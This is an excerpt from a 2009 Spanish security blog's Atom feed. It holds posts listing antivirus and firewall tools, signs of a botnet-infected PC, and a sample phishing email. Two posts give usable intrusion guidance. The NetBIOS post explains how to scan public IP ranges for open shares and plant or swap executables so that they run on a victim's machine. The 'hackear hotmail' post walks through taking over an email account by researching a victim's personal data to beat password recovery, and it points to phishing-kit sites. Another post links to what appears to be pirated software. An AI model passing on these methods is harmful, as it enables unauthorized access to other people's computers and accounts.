href="http://www.f-secure.com/en_EMEA/security/security-lab/tools-and-services/online-scanner/index.html"&gt;F-Secure&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.virustotal.com/es/"&gt;Virus Total&lt;/a&gt; (escaneo con varios antivirus del mercado)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ANTIVIRUS GRATUITOS:&lt;br /&gt;&lt;br /&gt;     &lt;br /&gt;      &lt;a href="http://www.avast.com/esp/download-avast-home.html"&gt;Avast!&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://free.avg.com/es-es/1"&gt;AVG&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.free-av.com/en/download/index.html"&gt;Avira&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://es.clamwin.com/"&gt;ClamWin&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;FIREWALLS GRATUITOS:&lt;br /&gt;&lt;br /&gt;      &lt;a href="http://personalfirewall.comodo.com/download_firewall.html"&gt;Comodo&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://free.agnitum.com/"&gt;Outpost&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.sunbeltsoftware.com/Home-Home-Office/Sunbelt-Personal-Firewall/"&gt;Sunbelt Kerio&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.simtel.net/product.php?id=53687"&gt;Sygate&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://download.zonelabs.com/bin/free/es/download/znalm.html"&gt;ZoneAlarm&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;TESTS PARA FIREWALLS:&lt;br /&gt;&lt;br /&gt;      &lt;a href="http://www.auditmypc.com/firewall-test.asp"&gt;AuditMyPc&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.internautas.org/w-scanonline.php"&gt;Internautas&lt;/a&gt;&lt;br /&gt;      &lt;a href="https://www.grc.com/x/ne.dll?bh0bkyd2"&gt;ShieldsUp&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.symantec.com/norton/sygate/index.jsp"&gt;Sygate&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.upseros.com/portscan.php"&gt;Upseros&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;RECURSOS IP:&lt;br /&gt;&lt;br /&gt;      &lt;a href="http://www.nirsoft.net/utils/ipnetinfo.html"&gt;IPNetInfo&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.geobytes.com/IpLocator.htm"&gt;Localizador de direcciones IP&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://www.myipaddress.com/show-my-ip-address/"&gt;Mi IP pública actual&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HERRAMIENTAS PARA ANALISIS Y REPARACION DE DISCOS:&lt;br /&gt;&lt;br /&gt;      &lt;a href="http://www.ultimatebootcd.com/"&gt;Ultimate Boot CD&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HERRAMIENTAS PARA WINDOWS:&lt;br /&gt;&lt;br /&gt;      &lt;a href="http://technet.microsoft.com/es-es/sysinternals/bb963902.aspx"&gt;Autoruns&lt;/a&gt;: Herramienta para conocer los elementos que &lt;a href="http://www.microsoft.com/downloads/Search.aspx?displaylang=es"&gt;auto-inician con Windows&lt;/a&gt; (úsese SOLO como análisis y NO como "reparador" de problemas)&lt;br /&gt;      Centro de descargas de Microsoft&lt;br /&gt;      &lt;a href="http://www.larshederer.homepage.t-online.de/erunt/"&gt;ERUNT&lt;/a&gt;: Herramienta para respaldo y recuperación del registro&lt;br /&gt;      &lt;a href="http://www.cexx.org/lspfix.htm"&gt;LSPFix&lt;/a&gt;: Herramienta para reparar el acceso a Internet cuando ciertos programas (generalmente malware) lo han "roto"&lt;br /&gt;      &lt;a href="http://technet.microsoft.com/en-us/sysinternals/bb545027.aspx"&gt;Microsoft Sysinternals&lt;/a&gt;: Conjunto de utilidades para Windows&lt;br /&gt;      &lt;a href="http://update.microsoft.com/windowsupdate/v6/thanks.aspx?ln=es&amp;&amp;thankspage=5"&gt;Microsoft Update&lt;/a&gt;&lt;br /&gt;      &lt;a href="http://technet.microsoft.com/es-es/sysinternals/bb896653.aspx"&gt;Process Explorer&lt;/a&gt;: Herramienta alternativa al Administrador de tareas (taskmgr.exe)&lt;br /&gt;      &lt;a href="http://www.microsoft.com/downloads/thankyou.aspx?familyId=5b33b5a8-5e76-401f-be08-1e1555d4f3d4&amp;displayLang=es"&gt;SP3 para XP&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-2976334647255450569?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/2976334647255450569/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/herramientas-de-seguridad.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2976334647255450569'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/2976334647255450569'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/herramientas-de-seguridad.html' title='HERRAMIENTAS DE SEGURIDAD'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-1033945390797706701</id><published>2009-10-19T10:04:00.000+02:00</published><updated>2009-10-19T10:07:47.456+02:00</updated><title type='text'>¿Cómo saber si tu PC es zombie?</title><content type='html'>Zombie es la denominación que se asigna a computadoras que tras haber sido infectadas por algún tipo de malware, pueden ser usadas por una tercera persona para ejecutar actividades hostiles. Este uso se produce sin la autorización o el conocimiento del usuario del equipo. El nombre procede de los zombis o muertos vivientes esclavizados, figuras legendarias surgidas de los cultos vudú.&lt;br /&gt;&lt;br /&gt;Con estos tres sencillos consejos, podremos en general, obtener indicios suficientes para sospechar si estamos o no contaminados y si nuestro equipo está comprometido, pudiendo pertenecer a una red Zombie.&lt;br /&gt;&lt;br /&gt;    * Primero: Ver si todo lo que está en ejecución en nuestro ordenador es todo lo que creemos tener instalado.&lt;br /&gt;&lt;br /&gt;Para ello, podemos utilizar software de inspección de procesos como el propio administrador de tareas que aparece al pulsar Ctr+Alt+Sup o un programa mejor como el ProcessXP indicando en el menú de View, sección “select columns” que queremos ver cual es el “command line” de los procesos. Traducido, ver cada programa que está en ejecución en qué directorio se encuentra. También es interesante saber si algún programa se intenta ocultar y para ello podemos usar, también de Sysinternal, el Rootkit revealer.&lt;br /&gt;&lt;br /&gt;    * Segundo: Ver si nuestro PC está conectado a Internet a los sitios correctos que estamos utilizando.&lt;br /&gt;&lt;br /&gt;Existen diferentes programas para averiguar esta información aunque solo nombraré varias alternativas:&lt;br /&gt;- La más sencilla es utilizar el comando NETSTAT con el parámetro -B que indica cada conexión que programa la está utilizando. En esta url hay más información sobre cómo usar este parámetro.&lt;br /&gt;- Otra opción es usar la aplicación de Foundstone Fport&lt;br /&gt;- Si somos de interfaces gráficas, la gente de Sysinternal en su momento también creo la herramienta TcpView con estos propósitos.&lt;br /&gt;&lt;br /&gt;    * Tercero: Revisar si nuestro ordenador tiene instalado malware utilizando los scanner online que ya se ofrecen.&lt;br /&gt;&lt;br /&gt;Para eso, podemos hacer una serie de comprobaciones básicas de las claves de registro que suele utilizar el malware a traves de REGEDIT.EXE. En concreto, las claves de registro a mirar son:&lt;br /&gt;&lt;br /&gt;* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;br /&gt;* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce&lt;br /&gt;* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunServices&lt;br /&gt;* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunServicesOnce&lt;br /&gt;* HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunOnce\Setup&lt;br /&gt;También disponemos de las Webs que analizan nuestro equipo en remoto para investigar si detectan algún tipo de software extraño como:&lt;br /&gt;- Safety.live.com de Microsoft.&lt;br /&gt;- Panda ActiveScan with TruPrevent®&lt;br /&gt;&lt;br /&gt;Evitar convertirse en Zombie: No navegar de forma abierta buscando ficheros de información lúdica, entornos no profesionales y de empresas desconocidas, ya que es fácil acabar en una web contaminada que nos haga descargar, sin darnos cuenta, programas que se ejecutarán en nuestro ordenador. Además, activar todos los mecanismos de seguridad del PC (antivirus, antispam, cortafuegos, copias de seguridad, etc.) y actualizarlos frecuentemente, tener dos particiones en el disco duro, una para el sistema operativo y los programas y otra para los documentos.&lt;br /&gt;&lt;br /&gt;Fuente: Lestat-Blog De Seguridad Informatica&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-1033945390797706701?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/1033945390797706701/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/como-saber-si-tu-pc-es-zombie.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/1033945390797706701'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/1033945390797706701'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/como-saber-si-tu-pc-es-zombie.html' title='¿Cómo saber si tu PC es zombie?'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-7168556821040811779</id><published>2009-10-16T11:23:00.000+02:00</published><updated>2009-10-16T11:43:49.502+02:00</updated><title type='text'>Tener archivos compartidos en pc grave error</title><content type='html'>En 1984, IBM diseñó un simple "application programming interface" (API/APIS) para conectar en red sus computadoras, llamado Network Basic Input/Output System (NetBIOS). El API NetBIOS proporcionaba un diseño rudimentario para que una aplicación se conectara y compartiese datos con otras computadoras.&lt;br /&gt;Sabiendo esto &lt;br /&gt;tener los  archivos compartidos en pc es un  grave error, ya que existen herramientas &lt;br /&gt;como scaner que facilita el ingreso mediante netbios a otras pcs.Primero que nada Netbios significa Network Basic Input Output system (Sistema basico de red de entrada y salida), esto no es considerado un bug, ni un backdoor ni nada asi q yo no lo considero reto, y por lo tanto no lo considero hacking"&lt;br /&gt;Generalmente son pcs de personas que comparten algunos de sus archivos no importantes como musica o imagenes. Pero en muchos de los casos se encuentran pcs que estan compartiendo todos sus discos (grave error).Aunque no se puede ejecutar archivos con este metodo se puede colar un "archivo" en la carpeta C:\Documents and Settings\Administrador\Menú Inicio\Programas\Inicio, asi cuando se reinicie la pc se ejecutara ese "archivo".&lt;br /&gt;Otro metodo consite en infectar o reemplazar archivos que se utilizen mucho en esa pc, como por ejemplo el msno el IE, asi cada vez que la victima haga click en el msn o el IE se ejecute nuestro "archivo".&lt;br /&gt;&lt;br /&gt;Una de tantas esas herramientas son :&lt;br /&gt;&lt;br /&gt;1.-SoftPerfect Network Scanner.Su uso es muy simple, primero seleccionamos un rango de ips, yo seleccione un rango grande desde 190.30.0.0 hasta 190.31.0.0 , despues hacemos click en "Start Scanning".. y empezaran a salir todas las pcs que esten conectadas a internet.&lt;br /&gt;La mayoria de estas pcs no estaran compartiendo archivos, las que si lo esten tienen que tener un [&gt;]o un [+] a la izquierda de la imagen de su pc.&lt;br /&gt;Entonces cuando queremos ver que archivos comparte una pc hacemos click en esa pestañita y saldran las carpetas. Para ver que contiene cada carpeta hacemos click en la misma y apareceran todos sus archivos y subcarpetas, vale aclarar que se puede descargar, subir y ejecutar archivos en nuestra pc.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mFMUaCwtbag/Stg-aZCrULI/AAAAAAAAABw/Kvqp_nnEtCU/s1600-h/netscan4.PNG"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 148px;" src="http://3.bp.blogspot.com/_mFMUaCwtbag/Stg-aZCrULI/AAAAAAAAABw/Kvqp_nnEtCU/s320/netscan4.PNG" border="0" alt=""id="BLOGGER_PHOTO_ID_5393129176895803570" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2.-Essential NetTools.Essential NetTools es un conjunto de herramientas útiles en el diagnóstico de redes y monitoreo de conexiones de red de su computadora.Su uso es igual al otro scaner, seleccionamos un rango de ips, para iniciar la auditoria, haga clic en el botón Start(Iniciar).&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_mFMUaCwtbag/Stg-D5DWZWI/AAAAAAAAABo/BQK1l4Lreoo/s1600-h/11716656tu6.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://4.bp.blogspot.com/_mFMUaCwtbag/Stg-D5DWZWI/AAAAAAAAABo/BQK1l4Lreoo/s320/11716656tu6.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5393128790351570274" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-7168556821040811779?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/7168556821040811779/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/tener-archivos-compartidos-en-pc-grave.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/7168556821040811779'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/7168556821040811779'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/tener-archivos-compartidos-en-pc-grave.html' title='Tener archivos compartidos en pc grave error'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_mFMUaCwtbag/Stg-aZCrULI/AAAAAAAAABw/Kvqp_nnEtCU/s72-c/netscan4.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-6946391735314606114</id><published>2009-10-15T13:02:00.001+02:00</published><updated>2009-10-15T13:03:48.818+02:00</updated><title type='text'>La cara oculta de Facebook</title><content type='html'>&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/xzTgIdNW6lg&amp;hl=es&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/xzTgIdNW6lg&amp;hl=es&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Espero lo vean hasta el final !!&lt;br /&gt;esta buena la Info!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-6946391735314606114?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/6946391735314606114/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/blog-post.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6946391735314606114'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/6946391735314606114'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/blog-post.html' title='La cara oculta de Facebook'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-3279964440810201354</id><published>2009-10-14T12:40:00.000+02:00</published><updated>2009-10-14T12:51:47.865+02:00</updated><title type='text'>hackear hotmail</title><content type='html'>Este post lo pongo para que sepais como os lo pueden hacer si lo haceis vostros eso ya es cuenta vuestra.&lt;br /&gt;&lt;br /&gt; 1.-El Método que vamos a comentar en primer lugar se basa en la Igeniería Social, es decir, en la recopilación de datos personales de la víctima  (si quieres información más extensa sobre Ingeniería Social busca en el google  ).&lt;br /&gt;      Todas las personas eligen como password una clave fácil de recordar o que simbolice algo importante para ellas, por ejemplo el nombre de sus hijos, de su mascota, de su grupo de música preferido, etc... El password MAS USADO es la fecha de nacimiento de la víctima, de su esposa/novia, o su fecha de aniversario. &lt;br /&gt;      Algo que no debes olvidar NUNCA es que yahoo tiene un sistema de seguridad muy curioso. Si intentas acceder 8-9 veces a la cuenta de un usuario, y no introduces la pass correcta, no te dejará volver a intentarlo en las próximas 24 horas y borrará TODOS los mensajes que tuviera el usuario.&lt;br /&gt;      ¿Qué podemos hacer entonces para entrar en su cuenta?&lt;br /&gt;      Debemos conocer su Fecha de Nacimiento, su Nacionalidad y su Codigo Postal. y algo más que después veremos. Asi que ponte a recopilar información. La nacionalidad es fácil de averiguar, y si sabes la ciudad ya puedes buscar su Cod. Postal usando google. En cuanto a su fecha de Nacimiento es algo más difícil, pero tal vez la haya puesto en su ficha personal pública en algún foro o algo así. Búsca en google su nick y seguramente te salga información valiosa sobre él.&lt;br /&gt;      Una vez que tengas esta información entra en hotmail (o yahoo), pincha en "olvidé mi contraseña" o "generar una nueva contraseña" entonces te aparecerá un breve cuestionario. Tendrás que poner aquí los datos que previamente buscaste: Fecha de Nacimiento, Nacionalidad y C.P.     ¿Qué ocurre si me dice que los datos no son correctos? Puede que nosotros no s hayamos equivocado al introducirlos, que no sean realmente correctos, o que la víctima mintiera y pusiera datos falsos al registrarse... Si algo de esto ocurre entonces inténtalo con el método 2.&lt;br /&gt;      Si tienes suerte y los datos coinciden, te encontrarás frente a la Pregunta Secreta. Puede ser algo así como:&lt;br /&gt;      ¿Cuál es el nombre de tu mascota?&lt;br /&gt;      ¿Cuál es el segundo apellido de tu padre?&lt;br /&gt;      Esta es la única información que te separa de la cuenta de tu víctima, así que ya sabes, vuelve a ponerte las pilas y BUSCA la respuesta!! &lt;br /&gt;&lt;br /&gt;&lt;br /&gt; 2.-El segundo método consiste en enviar un EXLOIT a la victima.EL término "exploit" tiene dos acepciones, la primera y original, se refiere a un programa expresamente diseñado para explotar una vulnerabilidad (bug) ed un sistema (esto no nos viene al caso). La otra acepción es la que nos interesa.. Exploit es un cuestionario ideado específicamente para engañar a un usuario de yahoo o hotmail, la víctima lo rellena con sus datos y entonces el programa manda toda esta  información (entre ella su contraseña) a nuestro email. Puedes encontrar algunos exploits muy bien conseguidos creados en lenguaje HTML y puedes mandarlos directamente desde algunas webs. (otros exploits no usan lenguaje html, como por ejemplo el método 3).&lt;br /&gt;       En www.hack.msn.net puedes encontrar exploits muy bien conseguidos, en la web vienen también las instrucciones de como mandarlos y dónde mirar la password de la víctima. Es un site recomendado por R3ckt3z en este mismo foro.&lt;br /&gt;       En www.hack-hotmail.net también hay exploits muy buenos. &lt;br /&gt;       Si quieres exploits diferentes o para otras cuentas de correo búscalos tú mismo en google.&lt;br /&gt;&lt;br /&gt; 3.-Este Método es una ESTAFA con la que te pueden ROBAR TU PASSWD!!.&lt;br /&gt;       Manda un correo recovermypwd@hotmail.com, en el subject pones "Recover passwd=fiel&amp;valid" sin comillas. En el cuerpo del mensaje pones lo siguiente:&lt;br /&gt;       "10%tucorreo@loquesea.com%tucontraseña=passwd%20%=valid?&lt;br /&gt;       10%tuvíctima@hotmail.com/%?&amp;" todo sin comillas, esto hará que hotmail te envíe la constraseña solicitada directamente a tu correo. (esto es completamente FALSO! Es tan solo un ejemplo!)&lt;br /&gt;       Te ecnontrarás por internet algunos "trucos" como este.. lo que tal vez ignores es que "recovermypwd@hotmail" es el correo que ha creado algún listillo, y le estás enviando tu correo y tu contraseña!!! ten cuidado, que es una estafaaa! &lt;br /&gt;       A estas técnicas de engaño se les llama Ingeniería Social. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4.-Este método es conocido como Web Spoofing, y consiste en simular la pantalla de bienvenida de hotmail o yahoo, y cuando alguien mete su login y contraseña, envía estos datos al email de quien lo configuró. Es básicamente el mismo sistema que el exploit.&lt;br /&gt;&lt;br /&gt;    5.- Usar un programa  stealer  que tenga la función de sacar el pass del msn (100% de  efectividad) &lt;br /&gt; &lt;br /&gt;    6.- Usar un programa de fuerza bruta (0% de efectividad, no se recomienda para nada)se bloquean los correos &lt;br /&gt;&lt;br /&gt;    7.-Por ultimo hay otro metodo  en el cual hay gente sin escrupulos que son los tecnicos en pc(no digo todos), los cuales al reparar el pc meten un troyano o un keylloger pero no para sacar cuentas de correo sino para poder hacer carding o venderlos datos bancarios a terceras personas para que ellos hagan carding.&lt;br /&gt;&lt;br /&gt;Bueno con esto es como os sacan las cuentas de correo.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-3279964440810201354?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/3279964440810201354/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/hackear-hotmail.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3279964440810201354'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/3279964440810201354'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/hackear-hotmail.html' title='hackear hotmail'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-207896014628210898</id><published>2009-10-12T12:30:00.000+02:00</published><updated>2009-10-12T12:36:08.251+02:00</updated><title type='text'>Uniblue Driver Scanner 2009</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_mFMUaCwtbag/StMGkGu5CcI/AAAAAAAAABg/WuJtHcqTpUc/s1600-h/a.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 274px;" src="http://3.bp.blogspot.com/_mFMUaCwtbag/StMGkGu5CcI/AAAAAAAAABg/WuJtHcqTpUc/s320/a.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5391660396244961730" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Hola hoy ostraigo un programa muy muy bueno , el problema de los driver es siempre que no sabemos donde buscarlos.Driver Scanner es la solucion perfecta para actualizar automáticamente los drivers de tu PC, ya no tendrás que complicarte buscando por los vericuetos de tu computadora informacion sobre que drivers estás utilizando para luego tener que buscar en internet si hay alguna actualizacion disponible.&lt;br /&gt;&lt;br /&gt;Driver Scanner realiza todas estas tareas en tu lugar, revisando la amplia base de datos que posee sobre los drivers actuales de muchos productos. Unos simples clicks y listo, nuestro ordenador estará "al día".&lt;br /&gt;&lt;br /&gt;Pero no solo eso, si por alguna razón debemos reinstalar nuestro sistema operativo (Windows), Driver Scanner realizara una copia de los drivers que estabas utilizando, para que, una vez re-instalado el sistema, puedas acceder directamente a tus antiguos drivers desde un solo lugar.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/146089320&lt;br /&gt;/Drivscan2009_archivosoft.rar"&gt;Descarga:&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Password&lt;br /&gt;http://archivosoft.blogspot.com&lt;br /&gt;&lt;br /&gt;fuente:&lt;br /&gt;http://archivosoft.blogspot.com&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6882397234957178715-207896014628210898?l=vigilantedelared.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://vigilantedelared.blogspot.com/feeds/207896014628210898/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/uniblue-driver-scanner-2009.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/207896014628210898'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6882397234957178715/posts/default/207896014628210898'/><link rel='alternate' type='text/html' href='http://vigilantedelared.blogspot.com/2009/10/uniblue-driver-scanner-2009.html' title='Uniblue Driver Scanner 2009'/><author><name>Cibercentinela</name><uri>http://www.blogger.com/profile/00237087687003170157</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_mFMUaCwtbag/SqPYBSbyulI/AAAAAAAAAAM/SxEt7BdJRRo/S220/calavera-pirata.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_mFMUaCwtbag/StMGkGu5CcI/AAAAAAAAABg/WuJtHcqTpUc/s72-c/a.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6882397234957178715.post-6308807881519436086</id><published>2009-10-11T11:48:00.000+02:00</published><updated>2009-10-11T12:00:32.402+02:00</updated><title type='text'>Envio de correo  falso</title><content type='html'>hola recibi este correo lo pongo para que veais lo que es phising.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;A causa de la modernizacion tecnica le aconsejamos a reactivar su cuenta‏&lt;br /&gt;De:  cajamadrid (Sericios@cajamadrid.es)&lt;br /&gt;&lt;br /&gt;Apreciado Cliente,&lt;br /&gt;&lt;br /&gt;- Nuestro nuevo sistema de seguridad le ayudara a evitar frecuentes transacciones de fraude y a guardar sus aportaciones.&lt;br /&gt;- A causa de la modernizacion tecnica le aconsejamos a reactivar su cuenta.&lt;br /&gt;Haga click en la referencia de abajo para entrar y empezar a usar su cuenta renovada.&lt;br /&gt;&lt;br /&gt;_ Para entrar en su cuenta, por favor :&lt;br /&gt;&lt;br /&gt;http://id.cajamadrid.es/auth_user/bin/auth_user.cgi?origine=wg&lt;br /&gt;&lt;br /&gt;En caso Ud.&lt;br /&gt;tenga preguntas acerca de su relacion financiera online, por favor, mandenos un Bank Mail o llamenos.&lt;br /&gt;Apreciamos mucho su negocio. Atenderle es un verdadero placer para nosotros.&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;CajaMadrid  &lt;br /&gt;&lt;br /&gt;Caja de Ahorros y Monte de Piedad de Madrid, CAJA MADRID, C.I.F. G-28029007, Plaza de Celenque, 2. 28013 Madrid. Inscrita en el Rº Mercantil de Madrid al folio 20, tomo 3067 General, hoja 52454, y en el Rº Especial de Cajas de Ahorros con el número 99. Código B.E.: 2038. Código BIC: CAHMESMMXXX. Entidad de crédito sujeta a supervisión del Banco de España.&lt;br /&gt;(c) Caja Madrid. 2001 - 2009. España. Todos los derechos reservados.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Una vez que entras en el link que ellos te ponen, entras en su scam para que pongas tus datos bancarios y lo copien en un txt. de esta forma te roban los datos bancarios.&lt;br /&gt;&lt;br /&gt;En este caso si entrais en el link directamente os dara como falsificacion eso  se debe que el scam esta alojado en algun host gratuito que no dejan poner scam , estos son un poco chapuzeros para poner scam 